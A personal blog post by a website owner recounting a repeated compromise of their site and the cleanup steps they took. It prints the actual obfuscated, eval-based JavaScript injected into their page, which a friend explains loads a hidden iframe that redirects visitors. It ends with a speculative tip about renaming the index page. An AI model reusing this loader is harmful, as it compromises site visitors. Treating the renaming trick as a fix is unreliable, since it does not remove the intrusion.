Hidden iFrames = Hidden Demons!

Setting the Scene

Following an extended period of disuse, I recently returned to one of my domains to completely overhaul and update it. Everything was as I'd left it except for a line of text at the top of the page that read:

you must pay for this crypt

A quick search proved that I'd been hacked and that this was malware. I don't know how long it had been there or how much damage this simple line of text had or could cause, but I certainly knew that I needed it gone. Now.

I connected immediately through my FTP program and deleted all my files. Naively assuming that the issue had been solved, I created a new two-page website and uploaded my files.

Checking it on various computers and browsers, the website looked great. I went back later that day to do some tweaking and was a bit surprised to see that only my background image remained. Everything else was missing. The table, my title image, my Adsense ad, my text, everything gone.

Again, naively assuming that I'd made a mistake, I uploaded my files again and completely the tweaks that I'd intended.

The following morning, I checked in again and my website again had only the background image. I knew then that this was not my mistake. Someone or something had access to my website.

First Attempt at a Fix

I started by uploading the website, again and again. It seemed that my website was disappearing (well, all except the background image) after 6 to 8 hours. There was no redirect or strange ads or text to replace my content on the site. And the code looked strange, with a blob of Javascript seeming to be the offending item, not originating from me.

Googling about the script or the symptoms brought few helpful results.

My next step was to change my passwords, starting with my FTP password and then my login password for my webspace provider account.

When that did not solve the issue, I called my webspace provider for assistance. Five times in total, with an email to their technical support people and finally to their security team. They were unhelpful, only reporting that no other IP address had uploaded to my webspace and that the issue was likely to be code-related and as such, out of their remit.

Getting Worse

Then I started seeing a flash of my background image followed quickly by a redirect to a website I'd never heard of.

My webspace provider had sent me a form letter email where they mentioned Code Injection and Remote File Inclusion but neither seemed exactly what I was going through and they were not interested in any further help.

The Offending Code (scroll right)

<html>
<head>
<title>Crazy!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#CCCC66" text="#006600" background="images/bg.jpg" link="#009933"> <script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c7 5c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h)e(s);</script>
<div align="center">
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><font size="7">This is crazy! <br>
Leave my site alone!</font></p>
</div>
</body>
</html>

A Shining Light on a Dark Day

I sent a message to a friend who I knew was web-savvy and who had worked in the web design field. He showed suitable sympathy and gave me a few suggestions of where to look for the answer.

He wrote:

I suspect what that Javascript is doing is, when it runs in the browser, it is corrupting the page by adding a "hidden iframe" into which is loaded a page that redirects you. Googling the term "hidden iframe" will give you more info.

Doing as I was told, I Googled "hidden iframes´╗┐" and landed here. This fantastic fellow then led me to the root of my problem and ultimately got me my website back. I must remember to send My Hero a big, fat cyber kiss!

The Solution

My Hero's steps for removing hidden iframes

  1. Do a full system scan. I did this and it took 6 hours, but it was well worth it. I found 4 malicious files, including 3 with 'Javascript' or 'JS' in the title and one with 'iframe' in the title.
  2. Change your FTP password.
  3. Keep the password secure by not clicking on 'save password'. Taking the time to type it in every time you want to access the webspace means that it will be difficult for hackers to steal it.
  4. If you can, do not use the FTP protocol. Instead, try to use the more secure SFTP or FTPS.

Finding these four malicious files and not saving my password has allowed me to regain control of my website.

It's a fabulous feeling!

´╗┐

UPDATE: A few weeks later...

I've had another attack on website since I wrote this hub. The symptoms were identical to last time, causing me immense frustration.

Only my index.htm page was ever affected and it got me to thinking that the attacker's code was likely written to affect pages with that name, or close variations like index.html. So I deleted my index page and saved it again using the name default.htm, which a browser also recognizes as the front page of a website.

Two weeks later, my website is still up and running. Could it be that bozo cyber attackers have written code for a relentless onslaught and have omitted to include default.htm? I'll go with that assumption for now!

More by this Author


Comments 1 comment

Giselle Maine 4 years ago

Fascinating... I think this will be very helpful for website owners. I'm glad you were able to solve and fix the problem in the end. I liked the step-by-step description of what happened.

    Sign in or sign up and post using a HubPages Network account.

    0 of 8192 characters used
    Post Comment

    No HTML is allowed in comments, but URLs will be hyperlinked. Comments are not for promoting your articles or other sites.


    Click to Rate This Article
    working